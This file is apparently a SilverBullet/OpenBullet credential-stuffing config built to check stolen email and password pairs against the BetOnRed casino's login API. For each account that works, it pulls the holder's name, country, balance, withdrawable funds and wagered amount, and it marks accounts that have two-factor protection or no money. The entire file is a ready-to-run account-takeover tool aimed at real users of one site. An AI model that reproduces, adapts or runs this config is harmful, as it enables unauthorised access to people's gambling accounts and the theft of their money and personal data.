[SETTINGS]
{
  "Name": "BetOnRed",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-09-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "BetOnRed",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#/ REQUEST GET "https://betonred.com/" ReadResponseSource=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Blocked? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Retry OR 
    KEY "<ADDRESS>" Contains "/not-allowed" 

#UUID PARSE "<COOKIES(UUID)>" LR "" "" -> VAR "UUID" 

#rotatorId PARSE "<COOKIES(rotatorId)>" LR "" "" -> VAR "X" 

#Length FUNCTION Length "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"customParamList\":{\"interest\":\"\",\"cxd\":\"\",\"qlt\":\"\"},\"rotatorId\":\"<X>\",\"rotatorRouter\":betonred1go.com\",\"rotatorHost\":\"betonred.com\"}" -> VAR "LEN" 

#ClearCookies FUNCTION ClearCookies -> VAR "CC" 

#/login?locale=en REQUEST POST "https://betonred.aramuz.net/frontapi/betonred/login?locale=en" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"customParamList\":{\"interest\":\"casino\",\"cxd\":\"\",\"qlt\":\"false\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Content-Length: <LEN>" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Origin: https://betonred.com" 
  HEADER "Priority: u=1, i" 
  HEADER "Referer: https://betonred.com/" 
  HEADER "Sec-Ch-Ua: \"(Not(A:Brand\";v=\"99\", \"Google Chrome\";v=\"126\", \"Chromium\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Full-Version-List: \"(Not(A:Brand\";v=\"99.0.0.0\", \"Google Chrome\";v=\"126\", \"Chromium\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Gpc: 1" 
  HEADER "Visitor-Uuid: <UUID>" 

#Valid? KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"token\":\"" 
  KEYCHAIN Failure OR 
    KEY "\"message\":\"Invalid" 

#token PARSE "<SOURCE>" JSON "token" -> VAR "X" 

#/profile?locale=en REQUEST GET "https://betonred.aramuz.net/frontapi/betonred/profile?locale=en" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Accept-Encoding: gzip, deflate, br, zstd" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Origin: https://betonred.com" 
  HEADER "Priority: u=1, i" 
  HEADER "Referer: https://betonred.com/" 
  HEADER "Sec-Ch-Ua: \"(Not(A:Brand\";v=\"99\", \"Google Chrome\";v=\"126\", \"Chromium\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Full-Version-List: \"(Not(A:Brand\";v=\"99.0.0.0\", \"Google Chrome\";v=\"126\", \"Chromium\";v=\"126\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Gpc: 1" 
  HEADER "Visitor-Uuid: <UUID>" 
  HEADER "X-Auth-Token: <X>" 

#firstName PARSE "<SOURCE>" JSON "firstName" -> VAR "FN" 

#lastName PARSE "<SOURCE>" JSON "lastName" -> VAR "LN" 

#fullName FUNCTION Constant "<FN> <LN>" -> CAP "Name" 

#country PARSE "<SOURCE>" JSON "country" CreateEmpty=FALSE -> CAP "Country" 

#moneyBalance PARSE "<SOURCE>" JSON "moneyBalance" CreateEmpty=FALSE -> CAP "Balance" "€" "" 

#withdrawable PARSE "<SOURCE>" JSON "withdrawable" CreateEmpty=FALSE -> CAP "Withdrawable" "€" "" 

#wagered PARSE "<SOURCE>" JSON "wagered" CreateEmpty=FALSE -> CAP "Wagered" "€" "" 

#€? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "\"twoFactorEnabled\":true" 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "<Withdrawable>" EqualTo "€0" 
    KEY "<Balance>" EqualTo "€0" 

